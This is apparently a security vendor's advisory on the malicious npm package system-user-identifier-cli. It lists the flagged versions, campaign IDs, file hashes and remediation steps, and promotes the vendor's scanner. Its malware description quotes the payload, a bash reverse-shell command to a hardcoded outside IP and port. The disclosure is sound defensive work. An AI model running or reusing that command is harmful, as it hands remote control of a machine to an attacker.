Which versions of system-user-identifier-cli are malicious?

The following npm versions of system-user-identifier-cli are flagged malicious: 2.0.0, 3.0.0, 4.0.0, 5.0.0, 6.0.0, 7.0.0, 7.0.1. Treat any of these as compromised.

How do I remediate system-user-identifier-cli if I installed it?

system-user-identifier-cli establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.

I already installed system-user-identifier-cli — how do I know if it already compromised me?

If system-user-identifier-cli was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is system-user-identifier-cli part of a known attack campaign?

Yes — system-user-identifier-cli is associated with the IN-MAL-2026-004574, IN-MAL-2026-004591, IN-MAL-2026-004578, IN-MAL-2026-004573, IN-MAL-2026-004575, IN-MAL-2026-004590, IN-MAL-2026-004577 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find system-user-identifier-cli across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for system-user-identifier-cli (7 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging system-user-identifier-cli across your stack and pipelines.

Malicious package

system-user-identifier-clinpm

Malicious code in system-user-identifier-cli (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4679

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall system-user-identifier-cli

What this malware does

index.js line 13 executes bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1" via child_process.exec, opening an interactive reverse shell to the hardcoded attacker-controlled host 101.43.232.7 on TCP port 7777. The shell fires whenever the package's entrypoint is invoked (e.g. npx system-user-identifier-cli or require of the module), giving the operator of that endpoint full interactive control of the installer's machine under the user that ran the tool. The package advertises itself as a trivial 'check system user identifier' utility and ships placeholder author metadata ('Your Name'); the reverse shell is undocumented and inconsistent with the stated purpose. There is no benign interpretation of a hardcoded /dev/tcp/<ip>/<port> bash redirector pointed at an arbitrary public IP.

Malicious versions

7 flagged

2.0.03.0.04.0.05.0.06.0.07.0.07.0.1

Indicators of compromise (SHA-256)

42d50bd01032d74eb793dda2457b06af253c79003f5b50d0e2979880698ab065

4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8

4f2b4c5d80f52f89845a4391b512fad3c089995c0594ca911b6d31d569820e8c

7f1037c433664bc87feded0df6ed7f751d2ea6c22ec88ef2aa2a039a9e85783e

83964970fb7996dfdeaed0e9c48b09642bbee83d429b196d8ef819468c847c08

a9a27bcdd265fbec58b0e52a3bd28d83906d5b14a2fd1d7e1147b9ef53398676

abcc89501c7e97df9031fc62642ea0e78dde0131d38b85b6b6a995c6e8dec2ec

Detection & response playbook

Backdoor / remote access

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for system-user-identifier-cli (7 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging system-user-identifier-cli across your stack and pipelines.
If you installed it — respond
system-user-identifier-cli establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.
Did it already run?
If system-user-identifier-cli was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks system-user-identifier-cli before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. system-user-identifier-cli on npm has been identified as a malicious package (versions 2.0.0, 3.0.0, 4.0.0, 5.0.0, 6.0.0, 7.0.0, 7.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004574IN-MAL-2026-004591IN-MAL-2026-004578IN-MAL-2026-004573IN-MAL-2026-004575IN-MAL-2026-004590IN-MAL-2026-004577

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks system-user-identifier-cli-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the C2 callback and severs the channel.

Malware detection Runtime egress monitoring